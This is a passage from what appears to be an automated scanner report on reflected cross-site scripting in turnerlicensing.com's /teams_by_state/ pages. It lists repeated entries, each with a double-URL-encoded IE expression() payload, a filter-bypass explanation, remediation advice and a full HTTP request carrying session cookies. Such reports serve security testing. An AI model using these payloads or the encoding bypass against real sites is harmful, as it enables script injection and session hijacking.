GET /teams_by_state/Indiana?ddb83%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252731d9a9bbd80=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.94. http://www.turnerlicensing.com/teams_by_state/Iowa [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Iowa
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7a3d8'style='x:expression(alert(1))'57114ddf99c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Iowa?7a3d8%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252757114ddf99c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.95. http://www.turnerlicensing.com/teams_by_state/Kansas [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Kansas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b1e4f'style='x:expression(alert(1))'77e22b95d60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Kansas?b1e4f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252777e22b95d60=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.96. http://www.turnerlicensing.com/teams_by_state/Kentucky [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Kentucky
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7860b'style='x:expression(alert(1))'bb84182b6d5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Kentucky?7860b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bb84182b6d5=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.97. http://www.turnerlicensing.com/teams_by_state/Louisiana [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Louisiana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e214f'style='x:expression(alert(1))'8a4ef989e82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Louisiana?e214f%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25278a4ef989e82=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.98. http://www.turnerlicensing.com/teams_by_state/Maryland [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Maryland
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as baba6'style='x:expression(alert(1))'86c1a467bc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Maryland?baba6%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252786c1a467bc1=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.99. http://www.turnerlicensing.com/teams_by_state/Massachusetts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Massachusetts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 24d7e'style='x:expression(alert(1))'473118b635c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Massachusetts?24d7e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527473118b635c=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.100. http://www.turnerlicensing.com/teams_by_state/Michigan [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Michigan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c4c53'style='x:expression(alert(1))'cbce184105d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Michigan?c4c53%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527cbce184105d=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.101. http://www.turnerlicensing.com/teams_by_state/Minnesota [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Minnesota
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 84920'style='x:expression(alert(1))'64dd360bb51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Minnesota?84920%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252764dd360bb51=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.102. http://www.turnerlicensing.com/teams_by_state/Mississippi [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Mississippi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2fff1'style='x:expression(alert(1))'459cb5a215 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Mississippi?2fff1%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527459cb5a215=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.103. http://www.turnerlicensing.com/teams_by_state/Missouri [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Missouri
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7754c'style='x:expression(alert(1))'27eccdc1792 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Missouri?7754c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252727eccdc1792=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.104. http://www.turnerlicensing.com/teams_by_state/Montana [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Montana
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5bcaf'style='x:expression(alert(1))'1afca94aa79 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Montana?5bcaf%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25271afca94aa79=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.105. http://www.turnerlicensing.com/teams_by_state/Montreal [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Montreal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7c04c'style='x:expression(alert(1))'d59743044a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Montreal?7c04c%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527d59743044a1=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.106. http://www.turnerlicensing.com/teams_by_state/Nebraska [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Nebraska
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e07a'style='x:expression(alert(1))'040901e41e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Nebraska?6e07a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527040901e41e8=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.107. http://www.turnerlicensing.com/teams_by_state/Nevada [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/Nevada
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ebfbe'style='x:expression(alert(1))'c4304c5bf67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /teams_by_state/Nevada?ebfbe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527c4304c5bf67=1 HTTP/1.1 Host: www.turnerlicensing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;
1.108. http://www.turnerlicensing.com/teams_by_state/New-Hampshire [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.turnerlicensing.com
Path:
/teams_by_state/New-Hampshire
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89c49%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25274d9b5eac50e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 89c49'style='x:expression(alert(1))'4d9b5eac50e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
